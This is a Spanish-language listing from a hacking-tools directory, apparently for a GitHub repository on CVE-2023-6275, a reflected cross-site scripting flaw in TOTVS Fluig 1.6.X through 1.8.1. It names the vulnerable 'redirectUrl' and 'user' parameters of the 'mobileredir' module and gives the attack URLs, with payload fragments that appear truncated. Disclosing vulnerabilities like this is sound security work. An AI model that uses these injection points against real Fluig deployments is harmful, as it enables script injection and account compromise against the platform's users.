Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-6275 — Cross-Site Scripting reflejado en TOTVS Fluig Plataform 1.6.X - 1.8.1 | Kitploit
Herramientas/GitHubGitHub/erickfernandox/cve-2023-6275
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHuberickfernandox/cve-2023-6275

CVE-2023-6275

Cross-Site Scripting reflejado en TOTVS Fluig Plataform 1.6.X - 1.8.1

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-6275 - Cross-Site Scripting Reflejado en la Plataforma TOTVS Fluig 1.6.X - 1.8.1

La plataforma TOTVS Fluig, en sus versiones desde 1.6.1.X hasta 1.8.1, es vulnerable a Cross-Site Scripting en los parámetros 'redirectUrl' y 'user' dentro del módulo 'mobileredir'.

Fluig es la plataforma de productividad y colaboración que se integra con el sistema ERP, desarrollada por la empresa de tecnología más grande de Brasil, TOTVS, y alojada en el servidor del cliente.

Versiones afectadas:

-- Fluig 1.6.X - Fluig 1.8.1 …

Vector de Ataque

https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl=PAYLOAD

https://fluig.host.com/mobileredir/openApp.jsp?user=PAYLOAD

Payloads:

https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl="> https://fluig.host.com/mobileredir/openApp.jsp?user=">

Descargar herramienta